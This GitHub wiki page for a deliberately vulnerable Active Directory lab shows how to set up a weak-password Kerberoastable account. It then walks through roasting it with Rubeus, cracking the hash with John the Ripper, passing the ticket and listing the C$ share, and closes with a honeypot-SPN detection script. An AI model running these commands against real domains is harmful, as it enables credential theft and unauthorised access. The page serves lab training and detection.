Kerberoastable Account - benlee105/DeliberateVulnADConfig GitHub Wiki

Creating a Kerberoastable Account
  1. Create a User account in Active Directory, with a weak password like P@ssw0rd
  2. Launch Active Directory Users and Computers
  3. Click View > Advanced Features
  4. Right click user account > click Properties > click Attribute Editor tab
  5. Scroll down to servicePrincipalName and set a service principal name
    MSSQLSvc/<Name.Of.Server.Plus.Domain>:1433

  6. Click OK to everything.

Attacking a Kerberoastable Account
  1. Roast all kerberoastable accounts using Rubeus

rubeus.exe kerberoast /simple /nowrap

  2. Copy out the hash and move it to Kali:

nano mssql

Right click to paste the hash.

Remove the Service Principal Name (e.g. MSSQLSvc/WIN-U2J3U9JDNJV.bentest.local:1433) from the content.

Ctrl + X > Y > Enter

john --format=krb5tgs --wordlist=<your Wordlist> mssql

  3. Copy the password from the john output, and utilize Rubeus to ask for a TGT, then pass the ticket.

rubeus.exe asktgt /user:<username> /password:<password> /ptt

  4. Verify access.

dir \\target\C$

Detecting Kerberoasting

By default, Rubeus will roast every account that has an SPN. Honeypot accounts can be configured with a "fake" SPN, which will generate a 4769 event when roasted. Since no legitimate client ever requests a ticket for this service, any such event provides a high-fidelity indication of this attack.
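
One way to act on the honeypot signal described above, as an added example that is not part of the original wiki: it scans Security-log events exported as XML for 4769 events whose ServiceName is the decoy account. The account name svc_honey_sql, the sample events and the function name are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Assumption: account name of the decoy that carries the fake SPN (hypothetical).
HONEYPOT_ACCOUNTS = {"svc_honey_sql"}

_EVENT = (
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    '<System><EventID>{eid}</EventID><TimeCreated SystemTime="{ts}"/></System>'
    '<EventData><Data Name="TargetUserName">{user}</Data>'
    '<Data Name="ServiceName">{svc}</Data>'
    '<Data Name="TicketEncryptionType">{etype}</Data>'
    '<Data Name="IpAddress">{ip}</Data></EventData></Event>'
)
# Constructed sample events (not real logs): a normal service ticket request,
# a request for the decoy account's ticket, and a TGT request (4768).
SAMPLE_XML = "<Events>" + "".join([
    _EVENT.format(eid=4769, ts="2024-05-01T09:00:01Z", user="alice@BENTEST.LOCAL",
                  svc="FILESRV01$", etype="0x12", ip="::ffff:10.0.0.21"),
    _EVENT.format(eid=4769, ts="2024-05-01T09:14:37Z", user="bob@BENTEST.LOCAL",
                  svc="SVC_Honey_SQL", etype="0x17", ip="::ffff:10.0.0.57"),
    _EVENT.format(eid=4768, ts="2024-05-01T09:15:00Z", user="bob",
                  svc="krbtgt", etype="0x12", ip="::ffff:10.0.0.57"),
]) + "</Events>"

def find_honeypot_requests(xml_text, honeypots=HONEYPOT_ACCOUNTS):
    """Return one alert dict per 4769 event whose ServiceName is a decoy account."""
    decoys = {name.lower() for name in honeypots}  # account names are case-insensitive
    alerts = []
    for event in ET.fromstring(xml_text).iterfind("e:Event", NS):
        if event.findtext("e:System/e:EventID", namespaces=NS) != "4769":
            continue
        data = {d.get("Name"): (d.text or "") for d in event.iterfind("e:EventData/e:Data", NS)}
        if data.get("ServiceName", "").lower() not in decoys:
            continue
        ip = data.get("IpAddress", "")
        alerts.append({
            "time": event.find("e:System/e:TimeCreated", NS).get("SystemTime"),
            "requester": data.get("TargetUserName", ""),
            # 4769 commonly records IPv4 clients in IPv4-mapped form (::ffff:a.b.c.d).
            "source_ip": ip[7:] if ip.startswith("::ffff:") else ip,
            "etype": data.get("TicketEncryptionType", ""),
        })
    return alerts

if __name__ == "__main__":
    for alert in find_honeypot_requests(SAMPLE_XML):
        print("ALERT: service ticket requested for honeypot account:", alert)
```

The requester and source address in each alert identify the account and host to investigate first.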
